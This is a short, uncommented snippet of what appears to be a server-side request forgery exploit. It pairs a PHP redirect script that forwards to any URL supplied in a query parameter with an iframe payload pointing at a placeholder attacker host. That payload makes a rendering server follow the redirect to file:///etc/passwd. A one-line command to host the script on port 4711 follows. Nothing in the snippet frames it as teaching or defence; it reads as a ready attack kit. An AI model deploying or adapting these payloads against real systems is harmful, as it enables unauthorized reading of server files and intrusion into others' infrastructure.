<?php $loc = "http://127.0.0.1/"; if(isset($_GET['a'])){ $loc = $_GET['a']; } header('Location: '.$loc); ?>
<iframe src="http://$ATTACKER_IP:4711/ssrf.php?a=file:///etc/passwd"/>
php -S 0.0.0.0:4711